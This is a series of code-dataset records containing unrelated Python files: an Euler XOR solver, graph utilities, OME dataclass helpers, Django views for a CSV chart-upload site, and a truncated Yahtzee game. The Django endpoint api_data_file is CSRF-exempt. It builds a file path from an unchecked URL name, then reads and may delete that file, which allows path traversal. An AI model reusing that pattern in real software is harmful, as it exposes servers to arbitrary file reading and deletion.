qkv\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"model/compressed_attention.py","file_name":"compressed_attention.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33016183","text":"from decimal import *\nfrom math import sin , pi , sqrt\n\ndef getRadian( x ):\n return x*Decimal(pi)/180\n\ndef area( a , b , c ):\n\n p = (a+b+c)/2\n return Decimal( sqrt( p*(p-a)*(p-b)*(p-c) ) )\n\nif __name__ == \"__main__\":\n\n getcontext().prec = 100\n n , r = map( Decimal , input().split() )\n\n beta = 90/n\n beta_radian = getRadian( beta )\n #print( beta_radian )\n\n gamma = 180/n\n gamma_radian = getRadian( gamma )\n #print( gamma_radian )\n\n S = r*r*Decimal(sin(beta_radian))*Decimal(sin(gamma_radian))/Decimal(sin(beta_radian+gamma_radian))\n print(n*S)","sub_path":"160218-volBIT-edu/630P.py","file_name":"630P.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"361765703","text":"# euler 59\n\nimport time\n\ndef get_text():\n\n file = 'euler059.txt'\n text = open(file).read()\n s = text.strip(\"\\n''\")\n s_int = list(map(int,s.split(\",\")))\n\n return s_int\n\ndef find_key(pile):\n\n freq = [' ','e' ,'t' ,'a', 'o', 'i', 'n','s', 'r', 'h' ,'l' ,'d' ,'c', 'u', 'm', 'f']\n freq_ord = [ord(ch) for ch in freq]\n pile_d = {x:pile.count(x) for x in pile}\n pile_s = sorted(pile_d, key=lambda x: pile_d[x])[::-1]\n\n key_pile = []\n\n for k in range(97,123):\n for i,o in zip(freq_ord,pile_s):\n if(i^k == o):\n key_pile.append(chr(k))\n\n return max(key_pile,key=key_pile.count)\n\ndef split_text(text):\n\n pile1 = []\n pile2 = []\n pile3 = []\n\n for i in range(0,len(text)-1,3):\n\n pile1.append(text[i])\n pile2.append(text[i+1])\n pile3.append(text[i+2])\n\n return find_key(pile1) + find_key(pile2) + find_key(pile3)\n\n\ndef xor_op(key,text):\n\n s_int = get_text()\n y = ''\n s = 0\n\n for i in range(0,len(s_int)-1,3):\n\n y += (chr(s_int[i]^ ord(key[0])))\n s += (s_int[i]^ ord(key[0]))\n y += (chr(s_int[i+1]^ord(key[1])))\n s += (s_int[i+1]^ ord(key[1]))\n y += (chr(s_int[i+2]^ord(key[2])))\n s += (s_int[i+2]^ ord(key[2]))\n\n\n # one character still left !\n s += (s_int[i+3]^ ord(key[0]))\n\n return (y,s)\n\ndef main():\n\n t = time.time()\n text = get_text()\n key = split_text(text)\n print(\"KEY: \", key)\n y,s = xor_op(key,text)\n print(\"\\nTEXT: \\n\\n\",y )\n print(\"\\nSUM: \", s)\n\n print(\"Time taken: \" , time.time()-t, \"s\")\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"euler059.py","file_name":"euler059.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"423289795","text":"# -*- coding: utf-8 -*-\n\nimport copy\nimport logging\n\nfrom graphit import __module__\n\nlogger = logging.getLogger(__module__)\n\n\ndef graph_undirectional_to_directional(graph):\n \"\"\"\n Convert a undirectional to a directional graph\n\n Returns a deep copy of the full graph with all undirectional edges\n duplicated as directional ones.\n\n In an undirectional edge the edge pair shares a single attribute\n dictionary. This dictionary gets duplicated to the unique directional\n edges.\n\n :param graph: Graph to convert\n :type graph: :graphit:Graph\n\n :return: Directional graph\n :rtype: :graphit:Graph\n \"\"\"\n\n if graph.directed:\n logging.info('Graph already configured as directed graph')\n\n graph_copy = graph.copy(deep=True)\n graph_copy.directed = True\n\n # remove all $data_ref pointers between undirectional edge pairs\n for edge in graph_copy.edges:\n if graph_copy.edges.has_data_reference(edge):\n graph_copy.edges.del_data_reference(edge)\n\n # Update reverse edge with data from forwards edge\n reverse_edge = tuple(reversed(edge))\n if reverse_edge in graph_copy.edges:\n graph_copy.edges[reverse_edge].update(graph_copy.edges[edge])\n\n return graph_copy\n\n\ndef graph_directional_to_undirectional(graph):\n \"\"\"\n Convert a directional to an undirectional graph\n\n Returns a deep copy of the full graph with all directional edges\n duplicated as undirectional ones.\n Undirectional edges share the same data dictionary. In converting\n directional to undirectional edges their data dictionaries will\n be merged.\n\n .. Note:: dictionary merging may result in undesirable results due\n to data overwrite.\n\n :param graph: Graph to convert\n :type graph: :graphit:Graph\n\n :return: Directional graph\n :rtype: :graphit:Graph\n \"\"\"\n\n if not graph.directed:\n logging.info('Graph already configured as undirected graph')\n\n graph_copy = graph.copy(deep=True)\n graph_copy.directed = False\n graph_copy.edges.clear()\n\n done = []\n for edge in graph.edges:\n reverse_edge = tuple(reversed(edge))\n values = copy.deepcopy(graph.edges[edge])\n\n if edge in done or reverse_edge in done:\n continue\n\n if reverse_edge in graph.edges:\n values.update(graph.edges[reverse_edge])\n done.append(reverse_edge)\n\n graph_copy.add_edge(*edge, **values)\n done.append(edge)\n\n return graph_copy\n\n\ndef edges_parent_to_subgraph(subgraph, parent=None):\n \"\"\"\n Return edges connecting a subgraph with the parent graph\n\n 'subgraph.origin' is used as parent graph by default to derive connections.\n This will no longer work in case a copy is made of the subgraph as it will\n reset the link to the parent.\n The `parent` argument can be used to specify a dedicated parent graph in\n these and all other cases where connected edges between two separate graphs\n that share the same node ID's needs to be determined.\n\n :param subgraph: subgraph\n :type subgraph: :graphit:Graph\n :param parent: dedicated parent graph to derive connections to/from\n :type parent: :graphit:Graph\n\n :return: edges connecting graphs\n :rtype: :py:list\n \"\"\"\n\n if parent is None:\n parent = subgraph\n\n connected = []\n for nid in subgraph.nodes():\n node = parent.getnodes(nid)\n connected.extend(node.connected_edges())\n\n return list(set(connected).difference(subgraph.edges))\n","sub_path":"graphit/graph_utils/graph_utilities.py","file_name":"graph_utilities.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"630677829","text":"from __future__ import annotations\n\nfrom dataclasses import MISSING, fields\nfrom datetime import datetime\nfrom enum import Enum\nfrom textwrap import indent\nfrom typing import TYPE_CHECKING, Any, Callable, Optional, Sequence, Type, Union\n\nfrom pydantic import validator\nfrom pydantic.dataclasses import _process_class\n\nif TYPE_CHECKING:\n from pydantic.dataclasses import DataclassType\n\n\nclass Sentinel:\n \"\"\"Create singleton sentinel objects with a readable repr.\"\"\"\n\n def __init__(self, name: str) -> None:\n self.name = name\n\n def __repr__(self) -> str:\n return f\"{__name__}.{self.name}\"\n\n\n# Default value to support optional fields in dataclass subclasses.\nEMPTY = Sentinel(\"EMPTY\")\n# Default value to support automatic numbering for id field values.\nAUTO_SEQUENCE = Sentinel(\"AUTO_SEQUENCE\")\n\n\n@validator(\"id\", pre=True, always=True)\ndef validate_id(cls: Type[Any], value: Any) -> str:\n \"\"\"Pydantic validator for ID fields in OME dataclasses.\n\n If no value is provided, this validator provides and integer ID, and stores the\n maximum previously-seen value on the class.\n \"\"\"\n from typing import ClassVar\n\n # get the required LSID type from the annotation\n id_type = cls.__annotations__.get(\"id\")\n if not id_type:\n return value\n\n # Store the highest seen value on the class._max_id attribute.\n if not hasattr(cls, \"_max_id\"):\n cls._max_id = 0\n cls.__annotations__[\"_max_id\"] = ClassVar[int]\n\n if value is AUTO_SEQUENCE:\n value = cls._max_id + 1\n if isinstance(value, int):\n v_id = value\n id_string = id_type.__name__[:-2]\n value = f\"{id_string}:{value}\"\n else:\n value = str(value)\n v_id = value.rsplit(\":\", 1)[-1]\n try:\n v_id = int(v_id)\n cls._max_id = max(cls._max_id, v_id)\n except ValueError:\n pass\n\n return id_type(value)\n\n\ndef modify_post_init(_cls: Type[Any]) -> None:\n \"\"\"Modify __post_init__.\n\n Provides support for non-default arguments in dataclass subclasses (where the super\n class has default args) by providing the default value \"EMPTY\" from this module.\n \"\"\"\n origin_post_init = getattr(_cls, \"__post_init__\", None)\n required_fields = {k for k, v in _cls.__dict__.items() if v is EMPTY}\n\n def new_post_init(self: Any, *args: Any) -> None:\n missed = {f for f in required_fields if getattr(self, f, None) is EMPTY}\n if missed:\n nmissed = len(missed)\n s = \"s\" if nmissed > 1 else \"\"\n raise TypeError(\n f\"__init__ missing {nmissed} required argument{s}: {sorted(missed)!r}\"\n )\n if origin_post_init is not None:\n origin_post_init(self, *args)\n\n setattr(_cls, \"__post_init__\", new_post_init)\n\n\ndef modify_repr(_cls: Type[Any]) -> None:\n \"\"\"Improved dataclass repr function.\n\n Only show non-default non-internal values, and summarize containers.\n \"\"\"\n # let classes still create their own\n if _cls.__repr__ is not object.__repr__:\n return\n\n def new_repr(self: Any) -> str:\n name = self.__class__.__qualname__\n lines = []\n for f in sorted(fields(self), key=lambda f: f.name not in (\"name\", \"id\")):\n if f.name.endswith(\"_\"):\n continue\n # https://github.com/python/mypy/issues/6910\n if f.default_factory is not MISSING: # type: ignore\n default = f.default_factory() # type: ignore\n else:\n default = f.default\n\n current = getattr(self, f.name)\n if current != default:\n if isinstance(current, Sequence) and not isinstance(current, str):\n rep = f\"[<{len(current)} {f.name.title()}>]\"\n elif isinstance(current, Enum):\n rep = repr(current.value)\n elif isinstance(current, datetime):\n rep = f\"datetime.fromisoformat({current.isoformat()!r})\"\n else:\n rep = repr(current)\n lines.append(f\"{f.name}={rep},\")\n if len(lines) == 1:\n body = lines[-1].rstrip(\",\")\n elif lines:\n body = \"\\n\" + indent(\"\\n\".join(lines), \" \") + \"\\n\"\n else:\n body = \"\"\n out = f\"{name}({body})\"\n return out\n\n setattr(_cls, \"__repr__\", new_repr)\n\n\ndef ome_dataclass(\n _cls: Optional[Type[Any]] = None,\n *,\n init: bool = True,\n repr: bool = False,\n eq: bool = True,\n order: bool = False,\n unsafe_hash: bool = False,\n frozen: bool = False,\n config: Type[Any] = None,\n) -> Union[Callable[[Type[Any]], DataclassType], DataclassType]:\n \"\"\"Wrapper on the pydantic dataclass decorator.\n\n Provides OME-specific methods and validators.\n \"\"\"\n\n def wrap(cls: Type[Any]) -> DataclassType:\n if getattr(cls, \"id\", None) is AUTO_SEQUENCE:\n setattr(cls, \"validate_id\", validate_id)\n modify_post_init(cls)\n if not repr:\n modify_repr(cls)\n return _process_class(cls, init, repr, eq, order, unsafe_hash, frozen, config)\n\n return wrap if _cls is None else wrap(_cls)\n\n\n__all__ = [\"EMPTY\", \"ome_dataclass\"]\n","sub_path":"src/ome_types/dataclasses.py","file_name":"dataclasses.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69575218","text":"import os\nimport csv\nimport glob\nimport logging\n\nfrom django.http import HttpResponseRedirect, JsonResponse, HttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.core.urlresolvers import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.conf import settings\nfrom django.contrib import auth\nfrom django.contrib.auth import authenticate\nfrom django.contrib.auth import login as auth_login\nfrom django.contrib.auth import logout as auth_logout\nfrom django.contrib.auth.decorators import login_required\n\nfrom vision import utils, forms\n\nlog_main = logging.getLogger('main')\n\n\n# INDEX\ndef index(request):\n \"\"\"首页\"\"\"\n response = TemplateResponse(request, 'vision/index.html', {})\n\n return response\n\n\n# COMPARISON\ndef comparison(request):\n \"\"\"数据可视化目的: 比较数据.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No file.')\n return HttpResponseRedirect(reverse('comparison'))\n\n is_active = utils.is_active(request)\n\n global settings\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('comparison'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_comparison()\n\n response = TemplateResponse(request, 'vision/comparison.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# CAUSAL\ndef causal(request):\n \"\"\"数据可视化目的: 探究因果关系.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No file.')\n return HttpResponseRedirect(reverse('causal'))\n\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('causal'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_causal()\n\n response = TemplateResponse(request, 'vision/causal.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# ALL CHARTS\ndef allcharts(request):\n \"\"\"数据可视化目的: 使用所有可视化组件.\n\n Note:\n + 上传的文件必须是 utf-8 编码,不带 BOM\n \"\"\"\n if request.method == 'POST':\n try:\n thefile = request.FILES['fbody']\n except Exception as e:\n log_main.warning('No file.')\n return HttpResponseRedirect(reverse('allcharts'))\n\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n sid = request.session.session_key\n if sid:\n fname = '{0}_{1}'.format(sid, request.FILES['fbody'].name)\n else:\n fname = request.FILES['fbody'].name\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n fname = request.FILES['fbody'].name\n\n if not os.path.isdir(dir_data):\n os.makedirs(dir_data)\n\n fname = os.path.join(dir_data, fname)\n\n with open(fname, 'wb') as fp:\n fp.write(thefile.read())\n\n return HttpResponseRedirect(reverse('allcharts'))\n\n form = forms.UploadFileForm()\n charts = utils.get_charts_all()\n\n response = TemplateResponse(request, 'vision/allcharts.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# HISTORY DATA\n@login_required\ndef historydata(request):\n \"\"\"注册用户的历史数据\"\"\"\n global settings\n\n username = request.user.username\n\n charts = utils.get_charts_all()\n form = forms.HistoryFileForm(username=username)\n\n response = TemplateResponse(request, 'vision/historydata.html', {\n 'charts': charts,\n 'form': form,\n })\n\n return response\n\n\n# API\n@csrf_exempt\ndef api_data_file(request, dtype=None, name=None):\n \"\"\"获取 csv 文件.\n\n Note:\n + 一次获取完后即删除文件.\n\n Input:\n + dtype: str, 取值范围 ['normal', 'cluster', 'pie', 'line']\n + name: str, 文件名称\n\n Output:\n + json 格式数据,\n - dtype 为 'normal' 时,内容为:\n [\n {\n 条目名称: xxx,\n 条目名称: xxx,\n ...,\n 条目名称: xxx,\n },\n {\n 条目名称: xxx,\n 条目名称: xxx,\n ...,\n 条目名称: xxx,\n },\n ...,\n {\n 条目名称: xxx,\n 条目名称: xxx,\n ...,\n 条目名称: xxx,\n },\n ]\n - dtype 为 'cluster' 时,内容为:\n {\n 条目名称: [xxx, xxx, ..., xxx],\n 条目名称: [xxx, xxx, ..., xxx],\n ...,\n 条目名称: [xxx, xxx, ..., xxx],\n },\n \"\"\"\n global settings\n\n is_active = utils.is_active(request)\n\n if not is_active:\n # 临时用户\n dir_data = settings.DIR_DATA_TMP\n else:\n # 注册用户\n dir_data = settings.DIR_DATA_LONG\n username = request.user.username\n dir_data = os.path.join(dir_data, username)\n\n if not name.endswith('.csv'):\n name = '{0}.csv'.format(name)\n\n fname = os.path.join(dir_data, name)\n\n ret = {\n 'status': 'success',\n 'errmsg': '',\n 'data': '',\n }\n if not os.path.isfile(fname):\n errmsg = '\"{0}\" is not a regular file.'.format(fname)\n log_main.warning(errmsg)\n\n ret['status'] = 'fail'\n ret['errmsg'] = errmsg\n else:\n with open(fname, 'r') as fp:\n dialect = csv.Sniffer().sniff(fp.readline())\n fp.seek(0)\n csvreader = csv.DictReader(fp, delimiter=dialect.delimiter)\n fieldnames = csvreader.fieldnames\n\n if dtype == 'normal':\n ret['data'] = []\n for row in csvreader:\n tmp = {}\n for field in fieldnames:\n tmp[field] = row[field].strip()\n\n ret['data'].append(tmp)\n elif dtype == 'line':\n ret['data'] = []\n tmp_arr = {}\n for field in fieldnames:\n tmp_arr[field] = []\n\n for row in csvreader:\n for field in fieldnames:\n tmp = float(row[field].strip())\n tmp_arr[field].append(tmp)\n\n for name, data in tmp_arr.items():\n ret['data'].append({'name': name, 'data': data})\n elif dtype == 'pie':\n ret['data'] = []\n for row in csvreader:\n values = []\n for field in fieldnames:\n value = row[field].strip()\n values.append(value)\n values[1] = float(values[1])\n ret['data'].append(values)\n\n if not is_active:\n # 删除临时用户的文件\n os.remove(fname)\n\n response = JsonResponse(ret)\n\n return response\n\n\n# REGISTER\ndef register(request):\n \"\"\"注册用户\"\"\"\n if request.method == 'POST':\n form = forms.UserForm(request.POST)\n\n if form.is_valid():\n cleaned_data = form.cleaned_data\n\n auth_user = auth.models.User.objects.create_user(**cleaned_data)\n auth_user.save()\n\n return HttpResponseRedirect(reverse('index'))\n else:\n log_main.info('form is invalid.')\n\n return HttpResponseRedirect(reverse('register'))\n\n form = forms.UserForm()\n\n response = TemplateResponse(request, 'vision/register.html', {\n 'form': form,\n })\n\n return response\n\n\n# LOGIN\ndef login(request):\n \"\"\"login\"\"\"\n if request.method == 'POST':\n form = forms.UserForm(request.POST)\n if form.is_valid():\n cleaned_data = form.cleaned_data\n user = authenticate(**cleaned_data)\n\n if user is not None:\n if user.is_active:\n auth_login(request, user)\n\n return HttpResponseRedirect(reverse('index'))\n else:\n error = '账户未激活'\n else:\n error = '用户名或密码错误'\n\n form = forms.UserForm()\n form.errors['error'] = error\n\n return HttpResponseRedirect(reverse('login'))\n\n form = forms.UserForm()\n\n response = TemplateResponse(request, 'vision/login.html', {'form': form})\n\n return response\n\n\n# LOGOUT\n@login_required\ndef logout(request):\n \"\"\"logout\"\"\"\n auth_logout(request)\n\n return HttpResponseRedirect(reverse('index'))\n\n\n# CHANGE PASSWORD\n@login_required\ndef modpasswd(request):\n \"\"\"修改密码\"\"\"\n if request.method == 'POST':\n form = forms.ModPasswdForm(request.POST)\n\n if form.is_valid():\n user = request.user\n cleaned_data = form.cleaned_data\n\n old_passwd = cleaned_data['old_passwd']\n new_passwd = cleaned_data['new_passwd']\n\n checked = user.check_password(old_passwd)\n\n if checked:\n user.set_password(new_passwd)\n user.save()\n return HttpResponseRedirect(reverse('index'))\n else:\n log_main.info('invalid')\n\n return HttpResponseRedirect(reverse('modpasswd'))\n\n form = forms.ModPasswdForm()\n\n response = TemplateResponse(request, 'vision/modpasswd.html', {\n 'form': form,\n })\n\n return response\n\n\n\n# TEST\ndef thanks(request):\n return HttpResponse('thanks')\n","sub_path":"vision/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"345940018","text":"'''\nAuthor: Kris Spencer\nDate Created: 12/13/2015\nPurpose: \n\n\t A game of Yahtzee. The user tries to get a score of 180 to break even. The user has a\n\t chance to win some money back with a score as little as 160. Earning a bonus pays $3 each\n\t The user can double their money (excluding bonus) by scoring 210.\n'''\nfrom Die import Die\n\nclass Yahtzee:\n\n\t__player = None #The player object passed in. Holds player data\n\t__cup = None\t #The cup the dice are rolled in. Holds upto 5 dice\n\t__lowerScore = 0 #The score of the lower half of a Yahtzee sheet\n\t__upperScore = 0 #The score of the upper half of a Yahtzee sheet\n\t__bonusScore = 0 #The upper score bonus and Yahtzee bonuses added-up\n\t__winnings = 0 #The amount of money the player has won\n\t__yahtzeeIsZero = False #Part of the check that a player is allowed a bonus Yahtzee. Can't have a 0 on original Yahtzee\n\t__cardCats = ['1s', '2s', '3s', '4s', '5s', '6s', '3Kind', '4Kind', 'House', 'Sm Straight', 'Lg Straight', 'Yahtzee', 'Chance'] #The categories in which a player can score\n\t__cardScores = [-1, -2, -3, -4, -5, -6, -30, -40, 25, 30, 40, 50, -10] #The point values awarded to the categories. Numbers that are negative are calculated\n\n\t#The constructor. Takes in the player object and stores it for later use\n\tdef __init__(self, player):\n\n\t\tself.__player = player\n\t\tself.__fillCup()\n\n\t#The only public function in the program. This is called to run the game\n\tdef run(self):\n\n\t\tbadInput = True\n\t\tisNotValid = True\n\t\tanswer = None\n\n\t\t#Checks to see if Yahtzee has been recycled. Yahtzee needs to be built as a new object to reset!\n\t\tif not self.__canStillScore():\n\n\t\t\tprint(\"Error: Yahtzee has not been reset!\")\n\t\t\treturn\n\n\t\tself.__printGameHeader()\n\t\t\n\t\t#Print the instructions if the user desires to see them\n\t\twhile badInput:\n\n\t\t\tanswer = input(\"Do you want to see the instructions? \")\n\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tbadInput = False\n\n\t\t\t\tif answer == 'yes' or answer == 'Yes':\n\n\t\t\t\t\tself.__printGameRules()\n\n\t\t#Reset for later use\n\t\tbadInput = True\n\n\t\t#Check and see if the user has the money to play. If not, return to main menu\t\t\n\t\tif not self.__userHasMoney():\n\n\t\t\treturn\n\n\t\t#Check to see if any categories are still open to score\n\t\twhile self.__canStillScore():\n\n\t\t\twhile badInput:\n\n\t\t\t\tanswer = input(\"Do you want to roll or quit? \")\n\n\t\t\t\tif answer == 'roll' or answer == 'Roll' or answer == 'quit' or answer == 'Quit':\n\n\t\t\t\t\tbadInput = False\n\n\t\t\t\t\tif answer == 'quit' or answer == 'Quit':\n\n\t\t\t\t\t\tprint(\"\\nYou've choosen to quit the game. Winnings = $0. Bye-bye\")\n\t\t\t\t\t\treturn\n\n\t\t\t#Reset for later use\n\t\t\tbadInput = True\n\n\t\t\troll = self.__rollCup()\n\t\t\tself.__printRoll(roll)\n\t\t\n\t\t\t#Start loop for alloted re-rolls. You get 2 chances to re-roll any dice of your choosing\n\t\t\tfor i in range(0, 2):\n\n\t\t\t\t#Get the die numbers the player wants to keep and not re-roll\n\t\t\t\tkeepSet = self.__getKeepSet()\n\t\t\t\t\n\t\t\t\t#If all 5 are wanted, then break the loop as the player doesn't want to roll any of them\n\t\t\t\tif len(keepSet) != 5:\n\n\t\t\t\t\troll = self.__keep(roll, keepSet)\n\t\t\t\t\troll += self.__rollCup(5 - len(roll))\n\t\t\t\t\troll.sort()\n\t\t\t\t\tself.__printRoll(roll)\n\n\t\t\t\telse:\n\n\t\t\t\t\tbreak\n\n\t\t\t#Makes the check if a bonus Yahtzee is to be rewarded\n\t\t\tif self.__isYahtzee(roll):\n\n\t\t\t\tself.__addBonusYahtzee()\n\n\t\t\t#Prints the categories in which the player can score. Doesn't show already scored categories\n\t\t\tprint('\\n')\n\t\t\tself.__printCats()\n\n\t\t\t#Set the score\n\t\t\twhile isNotValid:\n\n\t\t\t\tscoreCat = input(\"Enter on which to score: \")\n\t\t\t\tisNotValid = not self.__trySetScore(scoreCat, roll)\n\n\t\t\tisNotValid = True\n\n\t\t#After all categories are filled, check to see if the upper bonus applies and end the game\n\t\tself.__upperBonus()\n\t\tself.__endOfGame()\n\n\t#Checks for an open category\n\tdef __canStillScore(self):\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat != 'X':\n\n\t\t\t\treturn True\n\n\t\treturn False\n\n\t#Print the game header\n\tdef __printGameHeader(self):\n\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Welcome to Yahtzee! ***\")\n\t\tprint(\"*** Get as close to 180 points as you can ***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t#Print the rules\n\tdef __printGameRules(self):\n\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Roll the 5 dice and try to score in one of the following categories: ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** 1s: Add-up the 1's in the roll. Max: 5 ***\")\n\t\tprint(\"*** 2s: Add-up the 2's in the roll. Max: 10 ***\")\n\t\tprint(\"*** 3s: Add-up the 3's in the roll. Max: 15 ***\")\n\t\tprint(\"*** 4s: Add-up the 4's in the roll. Max: 20 ***\")\n\t\tprint(\"*** 5s: Add-up the 5's in the roll. Max: 25 ***\")\n\t\tprint(\"*** 6s: Add-up the 6's in the roll. Max: 30 ***\")\n\t\tprint(\"*** 3Kind: Roll has at least 3 of the same number. Max: 30 ***\")\n\t\tprint(\"*** 4Kind: Roll has at least 4 of the same number. Max: 30 ***\")\n\t\tprint(\"*** House: A 2 of a kind + a 3 of a kind. Set points: 25 ***\")\n\t\tprint(\"*** Sm Straight: 4 numbers in sequence. Set points: 30 ***\")\n\t\tprint(\"*** Lg Straight: 5 numbers in sequence. Set points: 40 ***\")\n\t\tprint(\"*** Yahtzee: A 5 of a kind. Set points: 50 ***\")\n\t\tprint(\"*** Chance: Add all dice values for score. Max: 30 ***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t\tinput(\"Press enter to continue\")\n\n\t\tprint('\\n')\n\t\tprint(\"****************************************************************************\")\n\t\tprint(\"*** Additional rules: ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** If you can't score in any categories left, you may put-down a 0. ***\")\n\t\tprint(\"*** ***\")\n\t\tprint(\"*** Bonuses can be scored in the two following ways: ***\")\n\t\tprint(\"*** If a Yahtzee is scored (not a 0), extra Yahtzees are 100 points each.***\")\n\t\tprint(\"*** If the 1s - 6s all add-up to be more than 63 points, 35 are awarded. ***\")\n\t\tprint(\"****************************************************************************\")\n\t\tprint('\\n')\n\n\t#Format the roll in a more understandible way\n\tdef __printRoll(self, roll):\n\n\t\tprint('\\n')\n\t\tprint(' 1 2 3 4 5')\n\n\t\tfor die in roll:\n\n\t\t\tprint('[', end = '')\n\t\t\tprint(die, end = '] ')\n\n\t\tprint('\\n')\n\n\t#Calculate the winnings and display them\n\tdef __endOfGame(self):\n\n\t\ttotal = self.__upperScore + self.__lowerScore + self.__bonusScore\n\n\t\tif total > 210:\n\n\t\t\tself.__winnings += 40\n\n\t\telif total > 200:\n\n\t\t\tself.__winnings += 30\n\n\t\telif total > 190:\n\n\t\t\tself.__winnings += 25\n\n\t\telif total > 180:\n\n\t\t\tself.__winnings += 20\n\n\t\telif total > 170:\n\n\t\t\tself.__winnings += 10\n\n\t\telif total > 160:\n\n\t\t\tself.__winnings += 5\n\n\t\tprint(\"\\n\", end='')\n\t\tprint(self.__player.getName(), end = \" \")\n\t\tprint(\"has won: $\", end=\"\")\n\t\tprint(self.__winnings)\n\t\tprint(\"The score was \", end=\"\")\n\t\tprint(total)\n\t\tself.__player.addToWallet(total)\n\t\tprint(\"\\nThanks for playing!\")\n\n\t#Checks to see if a bonus is deserved and applies it\n\tdef __addBonusYahtzee(self):\n\n\t\tisBonus = True\n\n\t\t#Checks to see if the first Yahtzee has been scored\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat == 'Yahtzee':\n\n\t\t\t\tisBonus = False\n\n\t\t#Checks that the first Yahtzee wasn't scored as a 0. If everything is good, adds to bonus score\n\t\tif isBonus:\n\n\t\t\tif not self.__yahtzeeIsZero:\n\n\t\t\t\tprint(\"\\nBonus Yahtzee Scored!!!\")\n\t\t\t\tself.__bonusScore += 100\n\t\t\t\tself.__winnings += 3\n\n\t\t\telse:\n\n\t\t\t\tprint(\"\\nBonus not scored: A 0 was recored for original Yahtzee\")\n\n\t#Check that the user has the money to play. Ask them if they want to pay to play\n\tdef __userHasMoney(self):\n\n\t\tanswer = None\n\n\t\twhile True:\n\n\t\t\tanswer = input(\"Do you want to play for $20? \")\n\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tif answer == 'no' or answer == 'No':\n\t\t\t\t\t\n\t\t\t\t\tprint(\"Goodbye\")\n\t\t\t\t\treturn False\n\n\t\t\t\tif self.__player.getCurrentWallet() < 20:\n\n\t\t\t\t\tprint(\"Not enough money, sorry\")\n\t\t\t\t\treturn False\n\n\t\t\t\telse:\n\n\t\t\t\t\tself.__player.subFromWallet(20)\n\n\t\t\t\treturn True\n\n\t#Checks if the upper bonus is to be awarded\n\tdef __upperBonus(self):\n\n\t\tif self.__upperScore >= 63:\n\n\t\t\tself.__bonusScore += 35\n\t\t\tself.__winnings += 3\n\n\t#Print-out the scorable categories. Skips ones that have been used already\n\tdef __printCats(self):\n\n\t\tfor cat in self.__cardCats:\n\n\t\t\tif cat != 'X':\n\n\t\t\t\tprint(cat, end=\" \")\n\n\t\tprint('\\n')\n\n\t#The user is about to put a 0 down. Confirms this is what they want to do\n\tdef __zeroIsOkay(self):\n\n\t\tanswer = None\n\n\t\twhile True:\n\n\t\t\tanswer = input(\"The score will result in a 0. Is this okay?: \")\n\t\t\t\n\t\t\tif answer == 'yes' or answer == 'Yes' or answer == 'no' or answer == 'No':\n\n\t\t\t\tbreak\n\n\t\tif answer == 'yes' or answer == 'Yes':\n\n\t\t\treturn True\n\n\t\treturn 